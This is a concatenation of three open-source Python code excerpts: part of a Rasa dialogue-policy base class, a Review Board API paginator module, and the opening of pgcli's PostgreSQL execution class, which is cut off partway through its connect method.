            isinstance(featurizer, MaxHistoryTrackerFeaturizer)
            and POLICY_MAX_HISTORY in policy_config
            and POLICY_MAX_HISTORY not in featurizer_config
        ):
            featurizer.max_history = policy_config[POLICY_MAX_HISTORY]
        return featurizer

    def _standard_featurizer(self) -> MaxHistoryTrackerFeaturizer:
        """Initializes the standard featurizer for this policy."""
        return MaxHistoryTrackerFeaturizer(
            SingleStateFeaturizer(), self.config.get(POLICY_MAX_HISTORY)
        )

    @property
    def featurizer(self) -> TrackerFeaturizer:
        """Returns the policy's featurizer."""
        return self.__featurizer

    @staticmethod
    def _get_valid_params(func: Callable, **kwargs: Any) -> Dict:
        """Filters out kwargs that cannot be passed to func.

        Args:
            func: a callable function

        Returns:
            the dictionary of parameters
        """
        valid_keys = rasa.shared.utils.common.arguments_of(func)

        # NOTE(review): the truthiness test also drops falsy values (0, False,
        # "", []) for otherwise-valid keys -- confirm this is intentional.
        params = {key: kwargs.get(key) for key in valid_keys if kwargs.get(key)}
        ignored_params = {
            key: kwargs.get(key) for key in kwargs.keys() if not params.get(key)
        }
        logger.debug(f"Parameters ignored by `model.fit(...)`: {ignored_params}")
        return params

    def _featurize_for_training(
        self,
        training_trackers: List[DialogueStateTracker],
        domain: Domain,
        precomputations: Optional[MessageContainerForCoreFeaturization],
        bilou_tagging: bool = False,
        **kwargs: Any,
    ) -> Tuple[
        List[List[Dict[Text, List[Features]]]],
        np.ndarray,
        List[List[Dict[Text, List[Features]]]],
    ]:
        """Transform training trackers into a vector representation.

        The trackers, consisting of multiple turns, will be transformed
        into a float vector which can be used by a ML model.

        Args:
            training_trackers:
                the list of the :class:`rasa.core.trackers.DialogueStateTracker`
            domain: the :class:`rasa.shared.core.domain.Domain`
            precomputations: Contains precomputed features and attributes.
            bilou_tagging: indicates whether BILOU tagging should be used or not

        Returns:
            - a dictionary of attribute (INTENT, TEXT, ACTION_NAME, ACTION_TEXT,
              ENTITIES, SLOTS, FORM) to a list of features for all dialogue turns in
              all training trackers
            - the label ids (e.g. action ids) for every dialogue turn in all training
              trackers
            - A dictionary of entity type (ENTITY_TAGS) to a list of features
              containing entity tag ids for text user inputs otherwise empty dict
              for all dialogue turns in all training trackers
        """
        state_features, label_ids, entity_tags = self.featurizer.featurize_trackers(
            training_trackers,
            domain,
            precomputations=precomputations,
            bilou_tagging=bilou_tagging,
            ignore_action_unlikely_intent=self.supported_data()
            == SupportedData.ML_DATA,
        )

        max_training_samples = kwargs.get("max_training_samples")
        if max_training_samples is not None:
            logger.debug(
                "Limit training data to {} training samples."
                "".format(max_training_samples)
            )
            state_features = state_features[:max_training_samples]
            label_ids = label_ids[:max_training_samples]
            entity_tags = entity_tags[:max_training_samples]

        return state_features, label_ids, entity_tags

    def _prediction_states(
        self,
        tracker: DialogueStateTracker,
        domain: Domain,
        use_text_for_last_user_input: bool = False,
        rule_only_data: Optional[Dict[Text, Any]] = None,
    ) -> List[State]:
        """Transforms tracker to states for prediction.

        Args:
            tracker: The tracker to be featurized.
            domain: The Domain.
            use_text_for_last_user_input: Indicates whether to use text or intent label
                for featurizing last user input.
            rule_only_data: Slots and loops which are specific to rules and hence
                should be ignored by this policy.

        Returns:
            A list of states.
        """
        # `prediction_states` operates on a batch of trackers; only the single
        # tracker's states are returned.
        return self.featurizer.prediction_states(
            [tracker],
            domain,
            use_text_for_last_user_input=use_text_for_last_user_input,
            ignore_rule_only_turns=self.supported_data() == SupportedData.ML_DATA,
            rule_only_data=rule_only_data,
            ignore_action_unlikely_intent=self.supported_data()
            == SupportedData.ML_DATA,
        )[0]

    def _featurize_for_prediction(
        self,
        tracker: DialogueStateTracker,
        domain: Domain,
        precomputations: Optional[MessageContainerForCoreFeaturization],
        rule_only_data: Optional[Dict[Text, Any]],
        use_text_for_last_user_input: bool = False,
    ) -> List[List[Dict[Text, List[Features]]]]:
        """Transforms training tracker into a vector representation.

        The trackers, consisting of multiple turns, will be transformed
        into a float vector which can be used by a ML model.

        Args:
            tracker: The tracker to be featurized.
            domain: The Domain.
            precomputations: Contains precomputed features and attributes.
            use_text_for_last_user_input: Indicates whether to use text or intent label
                for featurizing last user input.
            rule_only_data: Slots and loops which are specific to rules and hence
                should be ignored by this policy.

        Returns:
            A list (corresponds to the list of trackers)
            of lists (corresponds to all dialogue turns)
            of dictionaries of state type (INTENT, TEXT, ACTION_NAME, ACTION_TEXT,
            ENTITIES, SLOTS, ACTIVE_LOOP) to a list of features for all dialogue
            turns in all trackers.
        """
        return self.featurizer.create_state_features(
            [tracker],
            domain,
            precomputations=precomputations,
            use_text_for_last_user_input=use_text_for_last_user_input,
            ignore_rule_only_turns=self.supported_data() == SupportedData.ML_DATA,
            rule_only_data=rule_only_data,
            ignore_action_unlikely_intent=self.supported_data()
            == SupportedData.ML_DATA,
        )

    @abc.abstractmethod
    def train(
        self,
        training_trackers: List[TrackerWithCachedStates],
        domain: Domain,
        **kwargs: Any,
    ) -> Resource:
        """Trains a policy.

        Args:
            training_trackers: The story and rules trackers from the training data.
            domain: The model's domain.
            **kwargs: Depending on the specified `needs` section and the resulting
                graph structure the policy can use different input to train itself.

        Returns:
            A policy must return its resource locator so that potential children nodes
            can load the policy from the resource.
        """
        raise NotImplementedError("Policy must have the capacity to train.")

    @abc.abstractmethod
    def predict_action_probabilities(
        self,
        tracker: DialogueStateTracker,
        domain: Domain,
        rule_only_data: Optional[Dict[Text, Any]] = None,
        **kwargs: Any,
    ) -> PolicyPrediction:
        """Predicts the next action the bot should take after seeing the tracker.

        Args:
            tracker: The tracker containing the conversation history up to now.
            domain: The model's domain.
            rule_only_data: Slots and loops which are specific to rules and hence
                should be ignored by this policy.
            **kwargs: Depending on the specified `needs` section and the resulting
                graph structure the policy can use different input to make predictions.

        Returns:
            The prediction.
        """
        raise NotImplementedError("Policy must have the capacity to predict.")

    def _prediction(
        self,
        probabilities: List[float],
        events: Optional[List[Event]] = None,
        optional_events: Optional[List[Event]] = None,
        is_end_to_end_prediction: bool = False,
        is_no_user_prediction: bool = False,
        diagnostic_data: Optional[Dict[Text, Any]] = None,
        action_metadata: Optional[Dict[Text, Any]] = None,
    ) -> PolicyPrediction:
        """Builds a `PolicyPrediction` stamped with this policy's name and priority."""
        return PolicyPrediction(
            probabilities,
            self.__class__.__name__,
            self.priority,
            events,
            optional_events,
            is_end_to_end_prediction,
            is_no_user_prediction,
            diagnostic_data,
            action_metadata=action_metadata,
        )

    @classmethod
    def load(
        cls,
        config: Dict[Text, Any],
        model_storage: ModelStorage,
        resource: Resource,
        execution_context: ExecutionContext,
        **kwargs: Any,
    ) -> Policy:
        """Loads a trained policy (see parent class for full docstring)."""
        featurizer = None

        try:
            with model_storage.read_from(resource) as path:
                if (Path(path) / FEATURIZER_FILE).is_file():
                    featurizer = TrackerFeaturizer.load(path)

                # Runtime kwargs override the persisted config.
                config.update(kwargs)

        except (ValueError, FileNotFoundError, FileIOException):
            # Best-effort: fall back to a config-derived featurizer when the
            # persisted one cannot be read.
            logger.debug(
                f"Couldn't load metadata for policy '{cls.__name__}' as the persisted "
                f"metadata couldn't be loaded."
            )

        return cls(
            config, model_storage, resource, execution_context, featurizer=featurizer,
        )

    def _default_predictions(self, domain: Domain) -> List[float]:
        """Creates a list of zeros.

        Args:
            domain: the :class:`rasa.shared.core.domain.Domain`

        Returns:
            the list of the length of the number of actions
        """
        return [0.0] * domain.num_actions

    @staticmethod
    def format_tracker_states(states: List[Dict]) -> Text:
        """Format tracker states to human readable format on debug log.

        Args:
            states: list of tracker states dicts

        Returns:
            the string of the states with user intents and actions
        """
        # empty string to insert line break before first state
        formatted_states = [""]
        if states:
            for index, state in enumerate(states):
                state_messages = []
                if state:
                    if USER in state:
                        if TEXT in state[USER]:
                            state_messages.append(
                                f"user text: {str(state[USER][TEXT])}"
                            )
                        if INTENT in state[USER]:
                            state_messages.append(
                                f"user intent: {str(state[USER][INTENT])}"
                            )
                        if ENTITIES in state[USER]:
                            state_messages.append(
                                f"user entities: {str(state[USER][ENTITIES])}"
                            )
                    if PREVIOUS_ACTION in state:
                        if ACTION_NAME in state[PREVIOUS_ACTION]:
                            state_messages.append(
                                f"previous action name: "
                                f"{str(state[PREVIOUS_ACTION][ACTION_NAME])}"
                            )
                        if ACTION_TEXT in state[PREVIOUS_ACTION]:
                            state_messages.append(
                                f"previous action text: "
                                f"{str(state[PREVIOUS_ACTION][ACTION_TEXT])}"
                            )
                    if ACTIVE_LOOP in state:
                        state_messages.append(f"active loop: {str(state[ACTIVE_LOOP])}")
                    if SLOTS in state:
                        state_messages.append(f"slots: {str(state[SLOTS])}")
                state_message_formatted = " | ".join(state_messages)
                state_formatted = f"[state {str(index)}] {state_message_formatted}"
                formatted_states.append(state_formatted)

        return "\n".join(formatted_states)

    def __repr__(self) -> Text:
        """Returns text representation of object."""
        return f"{self.__class__.__name__}@{id(self)}"
class PolicyPrediction:
    """Stores information about the prediction of a `Policy`."""

    def __init__(
        self,
        probabilities: List[float],
        policy_name: Optional[Text],
        policy_priority: int = 1,
        events: Optional[List[Event]] = None,
        optional_events: Optional[List[Event]] = None,
        is_end_to_end_prediction: bool = False,
        is_no_user_prediction: bool = False,
        diagnostic_data: Optional[Dict[Text, Any]] = None,
        hide_rule_turn: bool = False,
        action_metadata: Optional[Dict[Text, Any]] = None,
    ) -> None:
        """Creates a `PolicyPrediction`.

        Args:
            probabilities: Confidence per action in the domain.
            policy_name: Name of the policy that produced this prediction.
            policy_priority: Priority of the policy that produced this
                prediction.
            events: Events the policy wants applied to the tracker no matter
                whether this prediction wins against other policies. Use with
                care — such events can influence the conversation flow.
            optional_events: Events applied to the tracker only in case this
                prediction wins. Use with care — such events can influence the
                conversation flow.
            is_end_to_end_prediction: `True` if the prediction was based on the
                text of the user message instead of the intent.
            is_no_user_prediction: `True` if neither the text nor the intent of
                the user message was used, e.g. for happy loop paths.
            diagnostic_data: Intermediate results or other debugging /
                fine-tuning information which Rasa itself does not require.
            hide_rule_turn: `True` if the prediction was made by rules which
                do not appear in the stories.
            action_metadata: Additional metadata passed along by policies.
        """
        self.probabilities = probabilities
        self.policy_name = policy_name
        # Stored as a 1-tuple on purpose — downstream code compares priorities
        # in tuple form.
        self.policy_priority = (policy_priority,)
        self.events = events or []
        self.optional_events = optional_events or []
        self.is_end_to_end_prediction = is_end_to_end_prediction
        self.is_no_user_prediction = is_no_user_prediction
        self.diagnostic_data = diagnostic_data or {}
        self.hide_rule_turn = hide_rule_turn
        self.action_metadata = action_metadata

    @staticmethod
    def for_action_name(
        domain: Domain,
        action_name: Text,
        policy_name: Optional[Text] = None,
        confidence: float = 1.0,
        action_metadata: Optional[Dict[Text, Any]] = None,
    ) -> "PolicyPrediction":
        """Create a prediction for a given action.

        Args:
            domain: The current model domain
            action_name: The action which should be predicted.
            policy_name: The policy which did the prediction.
            confidence: The prediction confidence.
            action_metadata: Additional metadata to be attached with the prediction.

        Returns:
            The prediction.
        """
        return PolicyPrediction(
            confidence_scores_for(action_name, confidence, domain),
            policy_name,
            action_metadata=action_metadata,
        )

    def __eq__(self, other: Any) -> bool:
        """Checks if the two objects are equal.

        Args:
            other: Any other object.

        Returns:
            `True` if other has the same type and the values are the same.
        """
        if not isinstance(other, PolicyPrediction):
            return False

        # `diagnostic_data` is deliberately left out of the comparison: it has
        # no effect on the action prediction.
        compared_attributes = (
            "probabilities",
            "policy_name",
            "policy_priority",
            "events",
            "optional_events",
            "is_end_to_end_prediction",
            "is_no_user_prediction",
            "hide_rule_turn",
            "action_metadata",
        )
        return all(
            getattr(self, attribute) == getattr(other, attribute)
            for attribute in compared_attributes
        )

    @property
    def max_confidence(self) -> float:
        """Gets the highest predicted confidence.

        Returns:
            The highest predicted confidence.
        """
        return max(self.probabilities, default=0.0)

    @property
    def max_confidence_index(self) -> int:
        """Gets the index of the action prediction with the highest confidence.

        Returns:
            The index of the action with the highest confidence.
        """
        return self.probabilities.index(self.max_confidence)
def confidence_scores_for(
    action_name: Text, value: float, domain: Domain
) -> List[float]:
    """Returns confidence scores if a single action is predicted.

    Args:
        action_name: the name of the action for which the score should be set
        value: the confidence for `action_name`
        domain: the :class:`rasa.shared.core.domain.Domain`

    Returns:
        the list of the length of the number of actions
    """
    # One-hot-style vector: every action gets 0.0 except the predicted one.
    scores = [0.0] * domain.num_actions
    scores[domain.index_for_action(action_name)] = value
    return scores
class InvalidPolicyConfig(RasaException):
    """Exception that can be raised when policy config is not valid.

    Raised e.g. when a policy's `featurizer` section lists more than one
    featurizer.
    """
def _get_featurizer_from_config(
    config: List[Dict[Text, Any]], policy_name: Text, lookup_path: Text
) -> Callable[..., TrackerFeaturizer]:
    """Gets the featurizer initializer and its arguments from a policy config.

    Args:
        config: The `featurizer` section of a policy's configuration: a list
            that must contain exactly one featurizer config dict.
        policy_name: Name of the policy (used in error messages).
        lookup_path: Module path in which the featurizer class is looked up.

    Returns:
        The featurizer class (or factory callable) named by the config.

    Raises:
        InvalidPolicyConfig: If more than one featurizer is specified.
    """
    # Only 1 featurizer is allowed
    if len(config) > 1:
        featurizer_names = [
            featurizer_config.get("name") for featurizer_config in config
        ]
        # `str()` guards against configs that lack a `name` key: joining a
        # `None` directly would raise a TypeError and mask the real error.
        readable_names = ", ".join(str(name) for name in featurizer_names)
        raise InvalidPolicyConfig(
            f"Every policy can only have 1 featurizer but '{policy_name}' "
            f"uses {len(config)} featurizers ('{readable_names}')."
        )

    featurizer_config = config[0]
    # NOTE: `pop` intentionally mutates the caller's dict — callers pass the
    # remaining keys as keyword arguments to the featurizer constructor.
    featurizer_name = featurizer_config.pop("name")
    featurizer_func = rasa.shared.utils.common.class_from_module_path(
        featurizer_name, lookup_path=lookup_path
    )

    return featurizer_func
| |
"""Paginators for iterating over API results."""
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit
class InvalidPageError(Exception):
    """An error representing an invalid page access.

    Raised by paginators when a previous or next page is requested but no
    such page exists.
    """
class BasePaginator(object):
    """Base class for a paginator used in the hosting services code.

    This provides the basic state and stubbed functions for a simple
    paginator. Subclasses can build upon this to offer more advanced
    functionality.

    Attributes:
        page_data (object):
            The data for the current page. Usually a list, but the exact
            type is implementation-dependent.

        per_page (int):
            The number of items to fetch per page.

        request_kwargs (dict):
            Keyword arguments to pass when making HTTP requests.

        start (int):
            The starting page. Whether this is 0-based or 1-based depends
            on the hosting service.

        total_count (int):
            The total number of results across all pages, or ``None`` when
            that value isn't known.
    """

    def __init__(self, start=None, per_page=None, request_kwargs=None):
        """Initialize the paginator.

        Args:
            start (int, optional):
                The starting page. Whether this is 0-based or 1-based
                depends on the hosting service.

            per_page (int, optional):
                The number of items per page.

            request_kwargs (dict, optional):
                Keyword arguments to pass when making a request.
        """
        self.start = start
        self.per_page = per_page
        self.page_data = None
        self.total_count = None
        self.request_kwargs = request_kwargs or {}

    @property
    def has_prev(self):
        """Whether there's a previous page available.

        Subclasses must override this to provide a meaningful value.
        """
        raise NotImplementedError

    @property
    def has_next(self):
        """Whether there's a next page available.

        Subclasses must override this to provide a meaningful value.
        """
        raise NotImplementedError

    def prev(self):
        """Fetch the previous page, returning the page data.

        Subclasses must override this to provide the logic for fetching pages.

        Returns:
            object:
            The resulting page data, usually a :py:class:`list`
            (implementation-dependent).

        Raises:
            InvalidPageError:
                There was no previous page to fetch.
        """
        raise NotImplementedError

    def next(self):
        """Fetch the next page, returning the page data.

        Subclasses must override this to provide the logic for fetching pages.

        Returns:
            object:
            The resulting page data, usually a :py:class:`list`
            (implementation-dependent).

        Raises:
            InvalidPageError:
                There was no next page to fetch.
        """
        raise NotImplementedError

    def iter_items(self, max_pages=None):
        """Iterate through all items across pages.

        This repeatedly fetches pages and yields every item they contain.
        The number of pages fetched can be capped to limit the impact on
        the server.

        Args:
            max_pages (int, optional):
                The maximum number of pages to iterate through.

        Yields:
            object:
            Each item from each page's payload.
        """
        for _ in self.iter_pages(max_pages=max_pages):
            # Each yielded page refreshes ``page_data`` in place.
            yield from self.page_data

    def iter_pages(self, max_pages=None):
        """Iterate through pages of results.

        This repeatedly fetches pages and yields each parsed page payload.
        The number of pages fetched can be capped to limit the impact on
        the server.

        Args:
            max_pages (int, optional):
                The maximum number of pages to iterate through.

        Yields:
            object:
            The parsed payload for each page.
        """
        pages_yielded = 0

        try:
            while max_pages is None or pages_yielded < max_pages:
                # The first iteration yields the already-loaded page; every
                # subsequent one fetches the next page first.
                if pages_yielded > 0:
                    self.next()

                yield self.page_data
                pages_yielded += 1
        except InvalidPageError:
            # Ran out of pages; end the iteration gracefully.
            pass

    def __iter__(self):
        """Iterate through pages of results.

        This is a simple wrapper for :py:meth:`iter_pages`.

        Yields:
            object:
            The parsed payload for each page.
        """
        yield from self.iter_pages()
class APIPaginator(BasePaginator):
    """Handles pagination for API requests to a hosting service.

    Hosting services may provide subclasses of ``APIPaginator`` that can handle
    paginating their specific APIs. These make it easy to fetch pages of data
    from the API, and also works as a bridge for Review Board's web API
    resources.

    All ``APIPaginators`` are expected to take an instance of a
    :py:class:`~reviewboard.hostingsvcs.service.HostingServiceClient` subclass,
    and the starting URL (without any arguments for pagination).

    Subclasses can access the
    :py:class:`~reviewboard.hostingsvcs.service.HostingServiceClient` through
    the :py:attr:`client` member of the paginator in order to perform requests
    against the hosting service.

    Attributes:
        client (reviewboard.hostingsvcs.service.HostingServiceClient):
            The hosting service client used to make requests.

        next_url (unicode):
            The URL for the next set of results in the page.

        page_headers (dict):
            HTTP headers returned for the current page.

        prev_url (unicode):
            The URL for the previous set of results in the page.

        url (unicode):
            The URL used to fetch the current page of data.
    """

    #: Query parameter name for the start page in a request.
    #:
    #: This is optional. Clients can specify this to provide this as part
    #: of pagination queries.
    start_query_param = None

    #: Query parameter name for the requested number of results per page.
    #:
    #: This is optional. Clients can specify this to provide this as part
    #: of pagination queries.
    per_page_query_param = None

    def __init__(self, client, url, query_params=None, *args, **kwargs):
        """Initialize the paginator.

        Once initialized, the first page will be fetched automatically.

        Args:
            client (reviewboard.hostingsvcs.service.HostingServiceClient):
                The hosting service client used to make requests.

            url (unicode):
                The URL used to make requests.

            query_params (dict, optional):
                The query parameters to append to the URL for requests.
                This will be updated with :py:attr:`start_query_param`
                and :py:attr:`per_page_query_param`, if set.

            *args (tuple):
                Positional arguments for the parent constructor.

            **kwargs (dict):
                Keyword arguments for the parent constructor.
        """
        super(APIPaginator, self).__init__(*args, **kwargs)

        self.client = client
        self.url = url
        self.prev_url = None
        self.next_url = None
        self.page_headers = None

        # Augment the URL with the provided query parameters.
        #
        # Note: the default used to be a mutable ``{}`` argument; ``None``
        # avoids the shared-mutable-default pitfall while remaining
        # backwards-compatible. The dict is copied so the caller's dict is
        # never mutated.
        query_params = dict(query_params or {})

        if self.start_query_param and self.start:
            query_params[self.start_query_param] = self.start

        if self.per_page_query_param and self.per_page:
            query_params[self.per_page_query_param] = self.per_page

        self.request_kwargs.setdefault('query', {}).update(query_params)

        self._fetch_page()

    @property
    def has_prev(self):
        """Whether there's a previous page available."""
        return self.prev_url is not None

    @property
    def has_next(self):
        """Whether there's a next page available."""
        return self.next_url is not None

    def prev(self):
        """Fetch the previous page, returning the page data.

        Returns:
            object:
            The resulting page data. This will usually be a :py:class:`list`,
            but is implementation-dependent.

        Raises:
            InvalidPageError:
                There was no previous page to fetch.
        """
        if not self.has_prev:
            raise InvalidPageError

        self.url = self.prev_url

        return self._fetch_page()

    def next(self):
        """Fetch the next page, returning the page data.

        Returns:
            object:
            The resulting page data. This will usually be a :py:class:`list`,
            but is implementation-dependent.

        Raises:
            InvalidPageError:
                There was no next page to fetch.
        """
        if not self.has_next:
            raise InvalidPageError

        self.url = self.next_url

        return self._fetch_page()

    def fetch_url(self, url):
        """Fetch the URL, returning information on the page.

        This must be implemented by subclasses. It must return a dictionary
        with the following fields:

        ``data`` (:py:class:`object`)
            The data from the page (generally as a list).

        ``headers`` (:py:class:`dict`)
            The headers from the page response.

        ``total_count`` (:py:class:`int`, optional)
            The optional total number of items across all pages.

        ``per_page`` (:py:class:`int`, optional)
            The optional limit on the number of items fetched on each page.

        ``prev_url`` (:py:class:`unicode`, optional)
            The optional URL to the previous page.

        ``next_url`` (:py:class:`unicode`, optional)
            The optional URL to the next page.

        Args:
            url (unicode):
                The URL to fetch.

        Returns:
            dict:
            The pagination information with the above fields.
        """
        raise NotImplementedError

    def _fetch_page(self):
        """Fetch a page and extracts the information from it.

        Returns:
            object:
            The resulting page data. This will usually be a :py:class:`list`,
            but is implementation-dependent.
        """
        page_info = self.fetch_url(self.url)

        self.prev_url = page_info.get('prev_url')
        self.next_url = page_info.get('next_url')
        self.per_page = page_info.get('per_page', self.per_page)
        self.page_data = page_info.get('data')
        self.page_headers = page_info.get('headers', {})
        self.total_count = page_info.get('total_count')

        # Make sure the implementation sent the correct data to us.
        assert self.prev_url is None or isinstance(self.prev_url, str), \
            ('"prev_url" result from fetch_url() must be None or Unicode '
             'string, not %r'
             % type(self.prev_url))
        assert self.next_url is None or isinstance(self.next_url, str), \
            ('"next_url" result from fetch_url() must be None or Unicode '
             'string, not %r'
             % type(self.next_url))
        assert self.total_count is None or isinstance(self.total_count, int), \
            ('"total_count" result from fetch_url() must be None or int, not '
             '%r'
             % type(self.total_count))
        assert self.per_page is None or isinstance(self.per_page, int), \
            ('"per_page" result from fetch_url() must be an int, not %r'
             % type(self.per_page))
        assert isinstance(self.page_headers, dict), \
            ('"page_headers" result from fetch_url() must be a dictionary, '
             'not %r'
             % type(self.page_headers))

        return self.page_data
class ProxyPaginator(BasePaginator):
    """A paginator that proxies to another paginator, transforming data.

    This attaches to another paginator, forwarding all requests and proxying
    all data.

    ``ProxyPaginator`` can take the data returned from the other paginator and
    normalize it, transforming it into a new form.

    This is useful when a
    :py:class:`~reviewboard.hostingsvcs.service.HostingService` wants to return
    a paginator to callers that represents data in a structured way, using an
    :py:class:`APIPaginator`'s raw payloads as a backing.

    Attributes:
        paginator (BasePaginator):
            The paginator that this is a proxy for.

        normalize_page_data_func (callable):
            A function used to normalize a page of results from the paginator.
    """

    def __init__(self, paginator, normalize_page_data_func=None):
        """Initialize the paginator.

        Args:
            paginator (BasePaginator):
                The paginator that this is a proxy for.

            normalize_page_data_func (callable, optional):
                A function used to normalize a page of results from the
                paginator.
        """
        # NOTE: BasePaginator.__init__ is deliberately not invoked here,
        # since every property it would set that we care about is
        # overridden below to delegate to the backing paginator.
        self.paginator = paginator
        self.normalize_page_data_func = normalize_page_data_func
        self.page_data = self.normalize_page_data(paginator.page_data)

    @property
    def has_prev(self):
        """Whether there's a previous page available."""
        return self.paginator.has_prev

    @property
    def has_next(self):
        """Whether there's a next page available."""
        return self.paginator.has_next

    @property
    def per_page(self):
        """The number of items requested per page."""
        return self.paginator.per_page

    @property
    def total_count(self):
        """The number of items across all pages, if known."""
        return self.paginator.total_count

    def prev(self):
        """Fetch the previous page, returning the page data.

        Returns:
            object:
            The resulting page data. This will usually be a :py:class:`list`,
            but is implementation-dependent.

        Raises:
            InvalidPageError:
                There was no previous page to fetch.
        """
        raw_page = self.paginator.prev()

        return self._process_page(raw_page)

    def next(self):
        """Fetch the next page, returning the page data.

        Returns:
            object:
            The resulting page data. This will usually be a :py:class:`list`,
            but is implementation-dependent.

        Raises:
            InvalidPageError:
                There was no next page to fetch.
        """
        raw_page = self.paginator.next()

        return self._process_page(raw_page)

    def normalize_page_data(self, data):
        """Normalize a page of data.

        If :py:attr:`normalize_page_data_func` was passed on construction, this
        will call it, passing in the page data. That will then be returned.

        This can be overridden by subclasses that want to do more complex
        processing without requiring ``normalize_page_data_func`` to be
        passed in.

        Args:
            data (object):
                The data to normalize.

        Returns:
            object:
            The resulting data.
        """
        func = self.normalize_page_data_func

        if callable(func):
            return func(data)

        return data

    def _process_page(self, page_data):
        """Process a page of data.

        This will normalize the page data, store it, and return it.

        Args:
            page_data (object):
                The data to process.

        Returns:
            object:
            The resulting data.
        """
        normalized = self.normalize_page_data(page_data)
        self.page_data = normalized

        return normalized
| |
import traceback
import logging
import psycopg2
import psycopg2.extras
import psycopg2.extensions as ext
import sqlparse
import pgspecial as special
from .packages.function_metadata import FunctionMetadata
from .encodingutils import unicode2utf8, PY2, utf8tounicode
import click
_logger = logging.getLogger(__name__)

# Cast all database input to unicode automatically.
# See http://initd.org/psycopg/docs/usage.html#unicode-handling for more info.
ext.register_type(ext.UNICODE)
ext.register_type(ext.UNICODEARRAY)
# OID 705 is the "unknown" pseudo-type; decode it as unicode as well.
ext.register_type(ext.new_type((705,), "UNKNOWN", ext.UNICODE))

# Cast bytea fields to text. By default, this will render as hex strings with
# Postgres 9+ and as escaped binary in earlier versions.
ext.register_type(ext.new_type((17,), 'BYTEA_TEXT', psycopg2.STRING))

# When running a query, make pressing CTRL+C raise a KeyboardInterrupt
# See http://initd.org/psycopg/articles/2014/07/20/cancelling-postgresql-statements-python/
ext.set_wait_callback(psycopg2.extras.wait_select)

# Error-handling policies accepted by PGExecute.run()'s on_error argument.
ON_ERROR_RAISE = 0   # re-raise the database error immediately
ON_ERROR_RESUME = 1  # report the error and keep running remaining statements
ON_ERROR_STOP = 2    # report the error and stop running remaining statements
def register_json_typecasters(conn, loads_fn):
    """Set the function for converting JSON data for a connection.

    Use the supplied function to decode JSON data returned from the database
    via the given connection. The function should accept a single argument of
    the data as a string encoded in the database's character encoding.
    psycopg2's default handler for JSON data is json.loads.
    http://initd.org/psycopg/docs/extras.html#json-adaptation

    This function attempts to register the typecaster for both JSON and JSONB
    types.

    Returns a set that is a subset of {'json', 'jsonb'} indicating which types
    (if any) were successfully registered.
    """
    registered = set()

    for type_name in ('json', 'jsonb'):
        try:
            psycopg2.extras.register_json(conn, loads=loads_fn,
                                          name=type_name)
        except psycopg2.ProgrammingError:
            # Type not available on this server (e.g. jsonb pre-9.4);
            # silently skip it.
            continue

        registered.add(type_name)

    return registered
def register_hstore_typecaster(conn):
    """Register a typecaster that renders hstore values as unicode.

    Instead of using register_hstore() which converts hstore into a python
    dict, we query the 'oid' of hstore which will be different for each
    database and register a type caster that converts it to unicode.
    http://initd.org/psycopg/docs/extras.html#psycopg2.extras.register_hstore
    """
    with conn.cursor() as cur:
        try:
            cur.execute("SELECT 'hstore'::regtype::oid")
            ext.register_type(
                ext.new_type((cur.fetchone()[0],), "HSTORE", ext.UNICODE))
        except Exception:
            # Best-effort: the hstore extension may not be installed in
            # this database, in which case there is nothing to register.
            pass
class PGExecute(object):
    """Owns a psycopg2 connection and runs SQL and metadata queries for pgcli."""

    # The boolean argument to the current_schemas function indicates whether
    # implicit schemas, e.g. pg_catalog
    search_path_query = '''
        SELECT * FROM unnest(current_schemas(true))'''

    schemata_query = '''
        SELECT nspname
        FROM pg_catalog.pg_namespace
        ORDER BY 1 '''

    tables_query = '''
        SELECT n.nspname schema_name,
               c.relname table_name
        FROM pg_catalog.pg_class c
             LEFT JOIN pg_catalog.pg_namespace n
               ON n.oid = c.relnamespace
        WHERE c.relkind = ANY(%s)
        ORDER BY 1,2;'''

    columns_query = '''
        SELECT nsp.nspname schema_name,
               cls.relname table_name,
               att.attname column_name
        FROM pg_catalog.pg_attribute att
             INNER JOIN pg_catalog.pg_class cls
               ON att.attrelid = cls.oid
             INNER JOIN pg_catalog.pg_namespace nsp
               ON cls.relnamespace = nsp.oid
        WHERE cls.relkind = ANY(%s)
              AND NOT att.attisdropped
              AND att.attnum > 0
        ORDER BY 1, 2, 3'''

    functions_query = '''
        SELECT n.nspname schema_name,
               p.proname func_name,
               pg_catalog.pg_get_function_arguments(p.oid) arg_list,
               pg_catalog.pg_get_function_result(p.oid) return_type,
               p.proisagg is_aggregate,
               p.proiswindow is_window,
               p.proretset is_set_returning
        FROM pg_catalog.pg_proc p
             INNER JOIN pg_catalog.pg_namespace n
               ON n.oid = p.pronamespace
        ORDER BY 1, 2'''

    databases_query = """SELECT d.datname as "Name",
        pg_catalog.pg_get_userbyid(d.datdba) as "Owner",
        pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding",
        d.datcollate as "Collate",
        d.datctype as "Ctype",
        pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges"
    FROM pg_catalog.pg_database d
    ORDER BY 1;"""

    datatypes_query = '''
        SELECT n.nspname schema_name,
               t.typname type_name
        FROM pg_catalog.pg_type t
             INNER JOIN pg_catalog.pg_namespace n
               ON n.oid = t.typnamespace
        WHERE ( t.typrelid = 0 -- non-composite types
                OR ( -- composite type, but not a table
                     SELECT c.relkind = 'c'
                     FROM pg_catalog.pg_class c
                     WHERE c.oid = t.typrelid
                   )
              )
              AND NOT EXISTS( -- ignore array types
                    SELECT 1
                    FROM pg_catalog.pg_type el
                    WHERE el.oid = t.typelem AND el.typarray = t.oid
                  )
              AND n.nspname <> 'pg_catalog'
              AND n.nspname <> 'information_schema'
        ORDER BY 1, 2;'''

    def __init__(self, database, user, password, host, port, dsn):
        """Store the connection parameters and open the initial connection."""
        self.dbname = database
        self.user = user
        self.password = password
        self.host = host
        self.port = port
        self.dsn = dsn
        self.connect()

    def connect(self, database=None, user=None, password=None, host=None,
                port=None, dsn=None):
        """(Re)connect, defaulting each parameter to the stored value.

        A DSN string, when given, takes precedence over the individual
        connection parameters. On success the old connection (if any) is
        closed and the stored parameters are updated to the effective ones.
        """
        db = (database or self.dbname)
        user = (user or self.user)
        password = (password or self.password)
        host = (host or self.host)
        port = (port or self.port)
        dsn = (dsn or self.dsn)
        if dsn:
            if password:
                dsn = "{0} password={1}".format(dsn, password)
            conn = psycopg2.connect(dsn=unicode2utf8(dsn))
            cursor = conn.cursor()

            # When we connect using a DSN, we don't really know what db,
            # user, etc. we connected to. Let's read it.
            db = self._select_one(cursor, 'select current_database()')
            user = self._select_one(cursor, 'select current_user')
